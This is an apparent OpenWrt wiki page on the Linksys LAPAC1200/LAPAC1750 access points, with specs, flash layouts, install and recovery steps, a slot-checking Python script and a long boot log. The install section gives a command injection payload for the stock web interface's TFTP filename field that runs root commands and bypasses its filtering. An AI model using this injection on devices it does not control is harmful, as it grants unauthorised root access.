Linksys LAPAC1200/LAPAC1750[C]

Under Construction!
This page is currently under construction. You can edit the article to help complete it.

The Linksys LAPAC1200 and LAPAC1750 are dual band wireless AC access points with PoE. They use either the QCA9557 or QCA9558 and have a 2×2:2 and 3×3:3 configuration, respectively. The variants with a C suffix are cloud managed versions that only differ in their software.

Linksys LAPAC1750

Work in Progress

Initial Pull Request

| Model | CPU | Ram | Flash | Network | WLAN | Serial |
|---|---|---|---|---|---|---|
| LAPAC1200 | Qualcomm Atheros QCA9558 | 128 MiB | 16 MiB | 1x 10/100/1000 | 2.4GHz: QCA9558 2×2:2 b/g/n, 5GHz: QCA9880 a/n/ac 2×2:2 | 3.3V 115200 8N1 |
| LAPAC1750 | Qualcomm Atheros QCA9558 | 128 MiB | 16 MiB | 1x 10/100/1000 | 2.4GHz: QCA9558 3×3:3 b/g/n, 5GHz: QCA9880 a/n/ac 3×3:3 | 3.3V 115200 8N1 |

From Stock Firmware Web Interface

Note: The C variants of these devices expect a GPG-signed firmware and will not accept the factory image in the web interface. Use the Debricking mechanism to install the factory image instead.

There are two firmware slots on the device. Due to the limited flash size, the partitioning layout expected by the bootloader and the fixed device tree, OpenWrt can only be installed into the first slot. When the factory image is applied to the second slot, OpenWrt will attempt to boot but fail to find its rootfs. This soft bricks the device with an endless boot loop. See Debricking for how to recover from such a state. It is therefore important to check which slot the stock firmware was booted from before applying the factory image.

The web interface of the stock firmware can be exploited to run arbitrary commands as root. This allows for inspecting the current kernel command line. Commands can be injected via the TFTP filenames in the web interface. The input is partially sanitized on the client side, which disallows any `;` characters, and partially transformed on the host side, which replaces any forward slashes. Both can be worked around by using `||` and `&&` for command chaining and expressions for the forward slash.

Commands can be most easily injected under Configuration → Administration → SSL Certificate by putting encoded commands into the Destination File under Export SSL Certificate to TFTP Server. A dummy address has to be supplied for the TFTP Server field as well. The output of the injected command is then shown as plain text between the tftp usage text and the HTML for the page. The slot of the currently booted stock firmware can be determined by looking at /proc/cmdline. Dump the current command line by injecting the command:

```
' || S=${PWD%u*} && ${S}bin${S}cat ${S}proc${S}cmdline #
```

```
Usage: tftp [OPTION]... HOST [PORT]

console=ttyS0,115200 root=31:03 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2)
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
...
```

If the root parameter points to 31:03, the firmware is running from the first slot. Flashing the factory image now would result in soft bricking the device. Install a stock firmware image first. If it points to 31:09 instead, the firmware is running from the second slot and the factory image can be applied.
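The slot check above can be done mechanically on the pasted response text instead of by eye. The following is an added example, not part of the original page or of OpenWrt; the function names are hypothetical, and it assumes `root=` is a decimal MAJOR:MINOR pair whose major 31 is the MTD block device and whose minor indexes the `mtdparts` list in order.

```python
import re
from dataclasses import dataclass

MTD_BLOCK_MAJOR = 31  # Linux block major for /dev/mtdblockN
UNITS = {"": 1, "k": 1024, "m": 1024 ** 2}
PART_RE = re.compile(r"(\d+)([km]?)\(([^)]+)\)", re.IGNORECASE)

# Response body as shown on this page: tftp usage text, command output, page HTML.
SAMPLE_RESPONSE = """Usage: tftp [OPTION]... HOST [PORT]

console=ttyS0,115200 root=31:03 rootfstype=squashfs init=/sbin/init mem=64m \
mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),\
64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2)
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
"""


@dataclass(frozen=True)
class Partition:
    index: int   # position in mtdparts, equal to the mtdblock minor number
    name: str
    offset: int  # byte offset from the start of flash
    size: int


def parse_mtdparts(value):
    """Turn 'dev:256k(u-boot),64k(u-boot-env),...' into ordered partitions."""
    device, sep, spec = value.partition(":")
    if not sep:
        raise ValueError("mtdparts has no device prefix")
    parts, offset = [], 0
    for index, item in enumerate(spec.split(",")):
        match = PART_RE.fullmatch(item.strip())
        if match is None:  # '-' (rest of flash) and '@offset' forms are not handled
            raise ValueError(f"unsupported partition spec: {item!r}")
        size = int(match.group(1)) * UNITS[match.group(2).lower()]
        parts.append(Partition(index, match.group(3), offset, size))
        offset += size
    return device, parts


def find_cmdline(text):
    """Pick the kernel command line out of the surrounding usage text and HTML."""
    for line in text.splitlines():
        tokens = line.split()
        if any(t.startswith("root=") for t in tokens) and any(
            t.startswith("mtdparts=") for t in tokens
        ):
            return line.strip()
    raise ValueError("no kernel command line with root= and mtdparts= found")


def booted_rootfs(cmdline):
    """Return (slot, Partition) for the rootfs named by root=MAJOR:MINOR."""
    params = dict(t.split("=", 1) for t in cmdline.split() if "=" in t)
    if "mtdparts" not in params:
        raise ValueError("command line has no mtdparts= parameter")
    match = re.fullmatch(r"(\d+):(\d+)", params.get("root", ""))
    if match is None:
        raise ValueError("root= is not in MAJOR:MINOR form")
    major, minor = int(match.group(1)), int(match.group(2))
    if major != MTD_BLOCK_MAJOR:
        raise ValueError(f"root device major {major} is not an MTD block device")
    _, parts = parse_mtdparts(params["mtdparts"])
    if minor >= len(parts):
        raise ValueError(f"root minor {minor} is outside the partition table")
    rootfs = parts[minor]
    slots = {"fs": 1, "fs_2": 2}  # rootfs partition names from the stock layout
    if rootfs.name not in slots:
        raise ValueError(f"root= points at {rootfs.name!r}, not a rootfs partition")
    return slots[rootfs.name], rootfs


def factory_image_allowed(text):
    """True only when stock runs from slot 2, the case this page says is safe."""
    slot, _ = booted_rootfs(find_cmdline(text))
    return slot == 2


if __name__ == "__main__":
    slot, rootfs = booted_rootfs(find_cmdline(SAMPLE_RESPONSE))
    print(f"stock firmware booted from slot {slot}: "
          f"{rootfs.name} at 0x{rootfs.offset:06x}, {rootfs.size // 1024} KiB")
    print("apply factory image now:", factory_image_allowed(SAMPLE_RESPONSE))
```

The offsets it computes agree with the MTD partition listing printed by the stock kernel at boot (`fs` at 0x180000, `fs_2` at 0x930000).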

From Bootloader Recovery

Use the Debricking mechanism to install the factory image.

  1. Hold reset button while powering up until the LEDs flash red/blue
  2. Use recovery tool to flash either a stock or OpenWrt factory image

The default network configuration is:

| Interface Name | Description | Default configuration |
|---|---|---|
| br-lan | LAN & WiFi | DHCP |

The Linksys LAPAC1750 has the following buttons:

| BUTTON | Event |
|---|---|
| Reset | reset |

| | |
|---|---|
| Architecture | MIPS 74Kc |
| Vendor | Qualcomm |
| Bootloader | Custom U-Boot 1.1.4 with Sercomm Boot Version 2.02.0 |
| System-On-Chip | Qualcomm Atheros QCA9557 (LAPAC1200) or QCA9558 (LAPAC1750) |
| CPU/Speed | 720 MHz |
| Flash-Chip | Macronix MX25L12835FMI |
| Flash size | 16 MiB |
| RAM | 128 MiB, 2x EtronTech EM68B16CWQH-25H |
| Wireless | 2.4GHz QCA955x b/g/n 2×2 or 3×3, 5GHz QCA9880 a/n/ac 2×2:2 or 3×3:3 |
| Ethernet | 10/100/1000 Mbit/s QCA9558 with Atheros AR8035 PHY |
| Serial | Yes, unpopulated, 3.3V 115200 8N1 |
| JTAG | unknown |

The stock flash layout is:

Layer0 raw flash
Layer1 u-boot u-boot-env kernel fs Log NVRAM NVRAM_bak calibration kernel_2 fs_2

The OpenWrt flash layout is:

Layer0 raw flash
Layer1 u-boot u-boot-env fwconcat0 art fwconcat1
Layer2 mtd-concat
Layer3 loader kernel rootfs
Layer4 rootfs rootfs_data

There are 5 tamper-resistant T15 screws, one hidden behind the label. Each corner also has plastic clips holding the cover. Take care when removing the cover, as the 6 PCB antennas are glued to it and the cables are too short to fully remove it.

How to connect to the Serial Port of this specific device:

Serial connection parameters
for Linksys LAPAC1750
115200, 8N1, 3.3V

port.jtag general information about the JTAG port, JTAG cable, etc.

```
U-Boot 1.1.4 (Jan 24 2014 - 13:18:57)
ap135 - Scorpion 1.0DRAM:
sri
Scorpion 1.0
ath_ddr_initial_config(200): (32bit) ddr2 init
tap = 0x00000003
Tap (low, high) = (0x4, 0x1e)
Tap values = (0x11, 0x11, 0x11, 0x11)
128 MB
Top of RAM usable for U-Boot at: 88000000
Reserving 344k for U-Boot at: 87fa8000
Reserving 192k for malloc() at: 87f78000
Reserving 44 Bytes for Board Info at: 87f77fd4
Reserving 36 Bytes for Global Data at: 87f77fb0
Reserving 128k for boot params() at: 87f57fb0
Stack Pointer at: 87f57f98
Now running in RAM - U-Boot at: 87fa8000
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
*** Warning *** : PCIe WLAN Module not found !!!
In: serial
Out: serial
Err: serial
Net: ath_gmac_enet_initialize...
athrs_sgmii_res_cal: cal value = 0xe
ath_gmac_enet_initialize: reset mask:c02200
Scorpion ----> S17 PHY *
athrs17_reg_init: complete
Force MAC0 as RGMII link up!
: cfg1 0x80000000 cfg2 0x7214
eth0: 58:ef:68:b2:d9:f7
eth0 up
Max resets limit reached exiting...
athr_gmac_sgmii_setup SGMII done
: cfg1 0x800c0000 cfg2 0x7214
eth1: 58:ef:68:b2:d9:f7
eth1 up
eth0, eth1
Setting 0x18116290 to 0x458ba14f
Hit any key to stop autoboot: 0
Flash Sector Number : 256.
***************************************************
Sercomm Boot Version 2.02.0
***************************************************
Get boot flag: 0x11
Begin to verify the backup image... ok!
Entering Firmware : Everything is OK.
### main_loop: bootcmd="bootm 0x9f800100"
## Booting image at 9f800100 ...
Image Name: Linux Kernel Image
Created: 2016-06-08 9:21:12 UTC
Image Type: MIPS Linux Kernel Image (gzip compressed)
Data Size: 1158024 Bytes = 1.1 MB
Load Address: 80002000
Entry Point: 801bc940
Verifying Checksum at 0x9f800140 ...OK
Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 801bc940) ...
## Giving linux memsize in bytes, 134217728
Starting kernel ...
Booting QCA955x
Linux version 2.6.31-svn2491 (root@ubuntu) (gcc version 4.3.3 (GCC) ) #37 Wed Jun 8 09:30:14 CST 2016
flash_size passed from bootloader = 16
prom_init(87), boot_flag 11, to boot backup fs
prom_init(94)kylin debug: project flag 02, cmdline: console=ttyS0,115200 root=31:09 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2)
CPU revision is: 00019750 (MIPS 74Kc)
cpu apb ddr apb
ath_sys_frequency: cpu 720 ddr 600 ahb 200
Determined physical RAM map:
memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
memory: 04000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
Normal 0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
Kernel command line: console=ttyS0,115200 root=31:09 rootfstype=squashfs init=/sbin/init mem=64m mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1216k(kernel),5952k(fs),512k(Log),64k(NVRAM),64k(NVRAM_bak),64k(calibration),1216k(kernel_2),5952k(fs_2)
PID hash table entries: 256 (order: 8, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 48084k/65536k available (1786k kernel code, 17384k reserved, 434k data, 148k init, 0k highmem)
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 359.42 BogoMIPS (lpj=718848)
Mount-cache hash table entries: 512
****************ALLOC***********************
Packet mem: 80264800 (0xe00000 bytes)
********************************************
NET: Registered protocol family 16
ath_pcibios_init: bus 0
ath_pcibios_init(250): PCI 0 CMD write: 0x356
registering PCI controller with io_map_base unset
ath_pcibios_init: bus 1
***** Warning PCIe 1 H/W not found !!!
registering PCI controller with io_map_base unset
bio: create slab <bio-0> at 0
pcibios_map_irq: IRQ 75 for bus 0
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
ATH GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 94
io scheduler noop registered
io scheduler deadline registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
brd: module loaded
SLIP: version 0.8.4-NET3.019-NEWTTY (dynamic channels, max=256).
CSLIP: code copyright 1989 Regents of the University of California.
10 cmdlinepart partitions found on MTD device ath-nor0
Creating 10 MTD partitions on "ath-nor0":
0x000000000000-0x000000040000 : "u-boot"
0x000000040000-0x000000050000 : "u-boot-env"
0x000000050000-0x000000180000 : "kernel"
0x000000180000-0x000000750000 : "fs"
0x000000750000-0x0000007d0000 : "Log"
0x0000007d0000-0x0000007e0000 : "NVRAM"
0x0000007e0000-0x0000007f0000 : "NVRAM_bak"
0x0000007f0000-0x000000800000 : "calibration"
0x000000800000-0x000000930000 : "kernel_2"
0x000000930000-0x000000f00000 : "fs_2"
GACT probability on
Mirror/redirect action on
u32 classifier
Performance counters on
input device check on
Actions configured
TCP cubic registered
NET: Registered protocol family 17
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
athwdt_init: Registering WDT success
ath_otp_init: Registering OTP success
VFS: Mounted root (squashfs filesystem) readonly on device 31:9.
Freeing unused kernel memory: 148k freed
Hey, here
init started: BusyBox v1.1.0 (2013.09.05-11:58+0000) multi-call binary
init started: BusyBox v1.1.0 (2013.09.05-11:58+0000) multi-call binary
Starting pid 19, console /dev/console: '/etc/rcS'
Tue Jan 1 01:01:00 UTC 2013
/usr/sbin/rc init Running............
Loading LED Module...
Loading Ethernet Driver...
qca955x_GMAC: Length per segment 1536
955x_GMAC: qca955x_gmac_attach
955x_GMAC: qca955x_set_gmac_caps
Currently in polling mode unit0
mac0 registering f1e .....
qca955x_GMAC: RX TASKLET - Pkts per Intr:160
qca955x_GMAC: Mac address for unit 0:bfff0000
qca955x_GMAC: ff:ff:ff:ff:ff:ff
qca955x_GMAC: Max segments per packet : 1
qca955x_GMAC: Max tx descriptor count : 128
qca955x_GMAC: Max rx descriptor count : 224
qca955x_GMAC: Mac capability flags : 42200
955x_GMAC: qca955x_gmac_attach
955x_GMAC: qca955x_set_gmac_caps
Currently in polling mode unit1
qca955x_GMAC: RX TASKLET - Pkts per Intr:160
qca955x_GMAC: Mac address for unit 1:bfff0006
qca955x_GMAC: ff:ff:ff:ff:ff:ff
MAC:1 Warning: Phy not found!!!
qca955x_GMAC: Max segments per packet : 1
qca955x_GMAC: Max tx descriptor count : 128
qca955x_GMAC: Max rx descriptor count : 224
qca955x_GMAC: Mac capability flags : 42200
955x_GMAC: Serdes PLL is locked value 0x1f018116
Loading Push Button Module...
/usr/sbin/pb_ap Running............
/usr/sbin/rc start Running............
ap_name=bridge,action=start
br->multicast_v4=1, br->multicast_v6=1
ap_name=lan,action=start
[ D ] athr_gmac_set_mac(1885)
athr_gmac_ring_alloc Allocated 2048 at 0x83a1d800
sram_desc_cnt 1536,mac Unit 0,Tx r->ring_desc 0xbd000000
athr_gmac_ring_alloc Allocated 3584 at 0x83a23000
sram_desc_cnt 4224,mac Unit 0,Rx r->ring_desc 0xbd000600
955x_GMAC: eth0 in RGMII MODE
Scorpion -----> 8035 PHY
Setting Drop CRC Errors, Pause Frames and Length Error frames
Setting PHY...
phyUnit=0 ATHR_AUTONEG_ADVERT:DE1
ATHR_1000BASET_CONTROL:200
ATHR_PHY_CONTROL:1000
ATHRSF1_PHY: Port 0, Neg Success
ATHRSF1_PHY: unit 0 phy addr 0
checking for the az feature of 8035...
Disabling 802.3az feature...
Restart auto-negotiation
955x_GMAC: Enet Unit:0 PHY:0 is UP eth0 RGMII 10Mbps full duplex
955x_GMAC: qca955x_soc_gmac_set_mac_duplex
955x_GMAC: qca955x_soc_gmac_set_link Done
955x_GMAC: done cfg2 0x7115 ifctl 0x0 miictrl
Setting Drop CRC Errors, Pause Frames and Length Error frames
955x_GMAC: qca955x_soc_gmac_set_mac_duplex
955x_GMAC: qca955x_soc_gmac_set_link Done
qca955x_GMAC:*********** LOOPBACK TEST 10Mbps PASS TX_INVT = 0
955x_GMAC: Enet Unit:0 PHY:0 is UP eth0 RGMII 100Mbps full duplex
955x_GMAC: qca955x_soc_gmac_set_mac_duplex
955x_GMAC: qca955x_soc_gmac_set_link Done
955x_GMAC: done cfg2 0x7115 ifctl 0x10000 miictrl
Setting Drop CRC Errors, Pause Frames and Length Error frames
955x_GMAC: qca955x_soc_gmac_set_mac_duplex
955x_GMAC: qca955x_soc_gmac_set_link Done
qca955x_GMAC:*********** LOOPBACK TEST 100Mbps PASS TX_INVT = 0
955x_GMAC: unit 0: phy 0 not up carrier 1
ether_ctrl=0
ether_speed=10Mbps
ether_duplex=half duplex
flow_control=0
phyUnit=0 ATHR_AUTONEG_ADVERT:DE1
ATHR_1000BASET_CONTROL:200
ATHR_PHY_CONTROL:1000
ATHRSF1_PHY: Port 0, Neg Success
ATHRSF1_PHY: unit 0 phy addr 0
Flow control is disabled.
ATH_MAC_TIMER: Port 0, Neg Success
ATH_MAC_TIMER: unit 0 phy addr 0
Device eth0 port type is 0
device eth0 entered promiscuous mode
ap_name=ip,action=start
ap_name=passwd,action=create
can't find this applicationap_name=ipv6,action=start
ap_name=telnetd,action=start
ap_name=ipmanage,action=start
ap_name=httpd,action=start
ap_name=ntp,action=restart
killall: ntp: no process killed
socket: Address family not supported by protocol
socket: Address family not supported by protocol
ap_name=whitelist,action=start
/usr/sbin/manager init Running............
ap_name=wlan,action=start
scfgmgr for local
NOTE: GARP request is sent.
adf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D)
ath_dfs: Version 2.0.0
Copyright (c) 2005-2006 Atheros Communications, Inc. All Rights Reserved
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_spectral: Version 2.0.0
Copyright (c) 2005-2009 Atheros Communications, Inc. All Rights Reserved
SPECTRAL module built on Jun 8 2016 17:22:42
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
955x_GMAC: enet unit:0 is up...
eth0 RGMII 1000Mbps full duplex
955x_GMAC: qca955x_soc_gmac_set_mac_duplex
955x_GMAC: qca955x_soc_gmac_set_link Done
955x_GMAC: done cfg2 0x7215 ifctl 0x10000 miictrl
br0: port 1(eth0) entering learning state
br0: port 1(eth0) entering forwarding state
ath_ahb: 10.2.85 (Atheros/multi-bss)
__ath_attach: Set global_scn[0]
Enterprise mode: 0x43fc0000
Restoring Cal data from Flash
SPECTRAL : get_capability not registered
HAL_CAP_PHYDIAG : Capable
SPECTRAL : Need to fix the capablity check for RADAR (spectral_attach : 231)
SPECTRAL : get_capability not registered
HAL_CAP_RADAR : Capable
SPECTRAL : Need to fix the capablity check for SPECTRAL (spectral_attach : 236)
SPECTRAL : get_capability not registered
HAL_CAP_SPECTRAL_SCAN : Capable
SPECTRAL : get_tsf64 not registered
spectral_init_netlink 52 NULL SKB
SPECTRAL : No ADVANCED SPECTRAL SUPPORT
SPECTRAL :----- module attached
Green-AP : Green-AP : Attached
ath_get_caps[6105] rx chainmask mismatch actual 7 sc_chainmak 0
ath_get_caps[6080] tx chainmask mismatch actual 7 sc_chainmak 0
ath_attach_dfs[12493] dfsdomain 1
SPECTRAL : module already attached
wifi0: Atheros ???: mem=0xb8100000, irq=2
ath_pci: 10.2.85 (Atheros/multi-bss)
ath_pci_probe PCI device id is 003c :003c
ath_pci 0000:00:00.0: ath DEBUG: sc=0x83a76000
ol_ath_pci_configure : num_desired MSI set to 0
Using PCI Legacy Interrupt
__ol_ath_attach: ath_attach TODO
__ol_ath_attach: dev name wifi1
ol_ath_attach() BMI inited.
ol_ath_attach() BMI Get Target Info.
ol_ath_attach() TARGET TYPE: 7 Vers 0x4100016c
NUM_DEV=1 FWMODE=0x2 FWSUBMODE=0x0 FWBR_BUF 0
ol_ath_attach() configure Target .
qc98xx_verify_checksum: flash checksum passed: 0x958d
ol_transfer_bin_file 1792: Download Flash data len 2116
ol_transfer_bin_file 1739: Download Firmware data len 218164
dhcpc: stopping bonjour before apply the new ip.
ap_name=mdns,action=stop
deleting routers
route: SIOC[ADD|DEL]RT: No such process
NOTE: GARP request is sent.
ol_ath_attach() Download FW.
ol_ath_attach() HT Create .
ol_ath_attach() HIF Claim.
ol_ath_attach() BMI Done.
ol_ath_attach() WMI attached. wmi_handle 82d40000
+HWT
CE_recv_buf_enqueue 569 Populate last entry 512 for CE 5
CE_recv_buf_enqueue 578 CE 5 wi 511 dest_ptr 0x52e020 nbytes 0 recv_ctxt 0x83b8a460
-HWT
ap_name=wins,action=restart
HTC Service:0x0300 ep:1 TX flow control disabled
CE_pkt_dl_len_set CE 4 Pkt download length 64
TXRX: Created pdev 83ad5a00
ap_name=ntp,action=restart
ap_name=httpredirect,action=restart
HTC Service:0x0100 ep:2 TX flow control disabled
wmi_service_ready_event_rx: WMI UNIFIED SERVICE READY event
num_rf_chain : 00000003
ht_cap_info: : 0000085b
vht_cap_info : 338001b2
vht_supp_mcs : 0000ffea
LARGE_AP enabled. num_peers 144, num_vdevs 16, num_tids 256
idx 0 req 1 num_units 0 num_unit_info 2 unit size 408 actual units 145
chunk 0 len 59160 requested ,ptr 0x2ea0000
FIRMWARE:P 145 V 16 T 443
FIRMWARE:_wlan_rtt_enable
wmi_ready_event_rx: WMI UNIFIED READY event
ol_ath_connect_htc() WMI is ready
ol_ath_set_host_app_area TODO
target uses HTT version 2.1; host uses 2.1
ol_ath_attach() connect HTC.
ol_regdmn_start: reg-domain param: regdmn=0, countryName=, wModeSelect=FFFFFFFF, netBand=FFFFFFFF, extendedChanMode=0.
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080
Add VHT80 channel: 5210
Add VHT80 channel: 5775
Skipping VHT80 channel 5825
ol_ath_phyerr_attach: called
OL Resmgr Init-ed
ol_if_spectral_setup
SPECTRAL : get_capability not registered
HAL_CAP_PHYDIAG : Capable
SPECTRAL : Need to fix the capablity check for RADAR (spectral_attach : 231)
SPECTRAL : get_capability not registered
HAL_CAP_RADAR : Capable
SPECTRAL : Need to fix the capablity check for SPECTRAL (spectral_attach : 236)
SPECTRAL : get_capability not registered
HAL_CAP_SPECTRAL_SCAN : Capable
SPECTRAL : get_tsf64 not registered
spectral_init_netlink 52 NULL SKB
Green-AP : Green-AP : Attached
Green-AP : Attached
ol_if_dfs_setup: called
ol_if_dfs_attach: called; ptr=82eb5974, radar_info=83a87c08
ol_ath_rtt_meas_report_attach: called
ol_ath_attach() UMAC attach .
ol_if_dfs_configure: called
ol_if_dfs_configure: FCC domain
ol_if_dfs_disable: called
ol_ath_attach: Calling ol_if_dfs_configure
__ol_ath_attach: init tx/rx TODO
__ol_ath_attach: hard_header_len reservation 58
create auto power entry
create wds_vlan_cfb entry
ap_name=wscupnp,action=restart
ap_name=mdns,action=restart
Initializing Pktlogs for 11ac
Module is already loaded.
ath_attach_dfs[12493] dfsdomain 1
[ D ] ath_vap_create(1010) id 17 ATH_BCBUF 32
VAP device ath017 created
Interface doesn't accept private ioctl...
ForBiasAuto (8BE0): Operation not permitted
DES SSID SET=........
Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
Warning: Driver for device ath017 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
MAC Prefix: 58:ef:68, MAX Power[0]: 20
[ D ] ath_vap_create(1010) id 0 ATH_BCBUF 32
VAP device ath000 created
Interface doesn't accept private ioctl...
ForBiasAuto (8BE0): Operation not permitted
DCS for CW interference mitigation: 0
DCS for WLAN interference mitigation: 0
WARNING: Fragmentation with HT mode NOT ALLOWED!!
DES SSID SET=LinksysSMB24G
Device ath000 port type is 0
device ath000 entered promiscuous mode
br0: port 2(ath000) entering learning state
br0: port 2(ath000) entering forwarding state
Module is already loaded.
isCountryCodeValid: EEPROM regdomain 0x0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2) flags 0x2150
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4) flags 0xa0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x8) flags 0xc0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x20) flags 0xd0
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x40) flags 0x150
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x800) flags 0x10080
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x2000) flags 0x20080
ol_regdmn_init_channels: !avail mode 0x1f9001 (0x4000) flags 0x40080
Add VHT80 channel: 5210
ath_ioctl: SIOC80211IFCREATE CALLED
[ D ] ol_ath_vap_create(1453) id 17 ATH_BCBUF 16
wmi_unified_vdev_create_send: ID = 0 VAP Addr = 58:ef:68:b2:d9:f9:
TXRX: Created vdev 82f69440 (58:ef:68:b2:d9:f9)
Setting vdev param = 26, value = 147
Setting vdev param = 27, value = 295
Setting vdev param = 28, value = 300
VAP device ath117 created
TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 320 vid 0 mac 58:ef:68:b2:d9:f9
TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 183 vid 0 mac 58:ef:68:b2:d9:f9
DES SSID SET=........
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
OL vap_start +
OL vap_start -
ol_vdev_start_resp_ev
ol_ath_vap_join: join operation is only for STA/IBSS mode
ol_ath_wmm_update:
Setting vdev param = 3, value = 100
Notification to UMAC VAP layer
FWLOG: [63584] WHAL_ERROR_RESET_CHANNF1 ( )
wmi_unified_vdev_stop_send
STOPPED EVENT for vap 0
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
OL vap_start +
OL vap_start -
ol_vdev_start_resp_ev
ol_ath_vap_join: join operation is only for STA/IBSS mode
ol_ath_wmm_update:
Setting vdev param = 3, value = 100
Notification to UMAC VAP layer
Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program swmi_unified_vdev_stop_send upports up to veSTOPPED EVENT for vap 0 rsion 20. Some things may be broken...
Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
Warning: Driver for device ath117 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken...
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
TXRX: ol_rx_peer_unmap_handler: peer 83ae9800 with ID 320 to be unmapped.
TXRX: ol_rx_peer_unmap_handler: peer 83ae9800 with ID 183 to be unmapped.
TXRX: ol_txrx_vdev_detach: deleting vdev object 82f69440 (58:ef:68:b2:d9:f9)
MAC Prefix: 58:ef:68, MAX Power[1]: 19
ath_ioctl: SIOC80211IFCREATE CALLED
[ D ] ol_ath_vap_create(1453) id 0 ATH_BCBUF 16
wmi_unified_vdev_create_send: ID = 0 VAP Addr = 58:ef:68:b2:d9:f9:
TXRX: Created vdev 82f69200 (58:ef:68:b2:d9:f9)
Setting vdev param = 26, value = 147
Setting vdev param = 27, value = 295
Setting vdev param = 28, value = 300
VAP device ath100 created
TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 320 vid 0 mac 58:ef:68:b2:d9:f9
TXRX: ol_txrx_peer_find_add_id: peer 83ae9800 ID 183 vid 0 mac 58:ef:68:b2:d9:f9
Setting vdev param = 1a, value = 1
OL vap_stop +
wmi_unified_vdev_stop_send
OL vap_stop -
STOPPED EVENT for vap 0
Setting vdev param = 12, value = 1
Setting vdev param = d, value = 1
Setting vdev param = 3, value = 100
ol_ath_desc_alloc_and_mark_for_mcast_clone: VAP Mcast to Unicast buffer allocated: 400
Setting vdev param = 2a, value = 1
ol_ath_vap_set_param: VAP param is now supported param:62 value:2
Setting vdev param = 26, value = 27
Setting vdev param = 27, value = 55
Setting vdev param = 28, value = 60
WARNING: Fragmentation with HT mode NOT ALLOWED!!
DES SSID SET=LinksysSMB5G
